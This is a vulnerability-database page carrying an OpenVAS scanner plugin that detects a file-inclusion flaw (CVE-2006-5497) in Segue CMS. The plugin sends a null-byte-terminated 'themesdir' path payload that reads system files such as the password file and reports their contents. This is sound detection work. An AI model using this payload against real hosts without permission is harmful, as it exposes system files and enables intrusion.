Lucene search

K
openvasCopyright (C) 2008 Justin SeitzOPENVAS:136141256231080085
HistoryOct 24, 2008 - 12:00 a.m.

Segue CMS themesdir Parameter Remote File Include Vulnerability

2008-10-2400:00:00
Copyright (C) 2008 Justin Seitz
plugins.openvas.org
24

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

AI Score

6.7

Confidence

Low

EPSS

0.031

Percentile

91.1%

The remote web server contains a PHP script that is affected by a
remote file include issue.

Description:

The remote web server is running Segue CMS, an open source content
management system tailored for educational institutions.

The version of Segue CMS installed on the remote host fails to
sanitize input to the

# SPDX-FileCopyrightText: 2008 Justin Seitz
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only

if(description)
{
  script_oid("1.3.6.1.4.1.25623.1.0.80085");
  script_version("2023-12-13T05:05:23+0000");
  script_tag(name:"last_modification", value:"2023-12-13 05:05:23 +0000 (Wed, 13 Dec 2023)");
  script_tag(name:"creation_date", value:"2008-10-24 23:33:44 +0200 (Fri, 24 Oct 2008)");
  script_tag(name:"cvss_base", value:"7.5");
  script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_cve_id("CVE-2006-5497");
  script_xref(name:"OSVDB", value:"29904");
  script_name("Segue CMS themesdir Parameter Remote File Include Vulnerability");
  script_category(ACT_ATTACK);
  script_tag(name:"qod_type", value:"remote_vul");
  script_copyright("Copyright (C) 2008 Justin Seitz");
  script_family("Web application abuses");
  script_dependencies("find_service.nasl", "no404.nasl", "webmirror.nasl", "DDI_Directory_Scanner.nasl", "gb_php_http_detect.nasl", "os_detection.nasl", "global_settings.nasl");
  script_require_ports("Services/www", 80);
  script_exclude_keys("Settings/disable_cgi_scanning");

  script_tag(name:"solution_type", value:"VendorFix");

  script_tag(name:"solution", value:"Update to version 1.5.9 or later.");

  script_tag(name:"summary", value:"The remote web server contains a PHP script that is affected by a
remote file include issue.

Description:

The remote web server is running Segue CMS, an open source content
management system tailored for educational institutions.

The version of Segue CMS installed on the remote host fails to
sanitize input to the 'themesdir' parameter before using it in the
'themes/program/themesettings.inc.php' script to include PHP code.
Provided PHP's 'register_globals' setting is enabled, an
unauthenticated attacker can exploit this issue to view arbitrary
files and execute arbitrary code, possibly taken from third-party
hosts, on the remote host.");
  script_xref(name:"URL", value:"http://www.milw0rm.com/exploits/2600");
  script_xref(name:"URL", value:"http://www.securityfocus.com/bid/20640");
  script_xref(name:"URL", value:"http://www.nessus.org/u?5c00bd47");
  exit(0);
}

include("host_details.inc");
include("os_func.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("port_service_func.inc");
include("list_array_func.inc");
include("misc_func.inc");

port = http_get_port( default:80 );
if( !http_can_host_php( port:port ) ) exit( 0 );

files = traversal_files();

foreach dir( make_list_unique( "/segue", "/seguecms", "/cms", "/blog", "/forum", http_cgi_dirs( port:port ) ) ) {

  if( dir == "/" ) dir = "";

  foreach pattern( keys( files ) ) {

    file = files[pattern];

    req = http_get( item:string( dir, "/themes/program/themesettings.inc.php?themesdir=/", file, "%00" ),port:port );
    res = http_keepalive_send_recv( port:port, data:req, bodyonly:TRUE );
    if( !res ) continue;

    if( egrep( pattern:pattern, string:res ) ||
      string( "main(", file, "\\0themes/program/themesettings.inc.php): failed to open stream" ) >< res ||
      string( "main(", file, "): failed to open stream: No such file" ) >< res ||
      "open_basedir restriction in effect. File(" >< res ) {

      passwd = "";
      if( egrep( pattern:pattern, string:res ) ) {
        passwd = res;
        if( "<br" >< passwd ) passwd = passwd - strstr( passwd, "<br" );
        if( "Choose the color scheme" >< passwd )
          passwd = passwd - strstr( passwd, "Choose the color scheme" );
      }

      if( passwd ) {
        info = string( "The version of Segue CMS installed in directory '", dir, "'\n",
          "is vulnerable to this issue. Here is the contents of /" + file + "\n",
          "from the remote host :\n\n", passwd );
      }
      else info = "";

      security_message( data:info, port:port );
      exit( 0 );
    }
  }
}

exit( 99 );

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

AI Score

6.7

Confidence

Low

EPSS

0.031

Percentile

91.1%

Related for OPENVAS:136141256231080085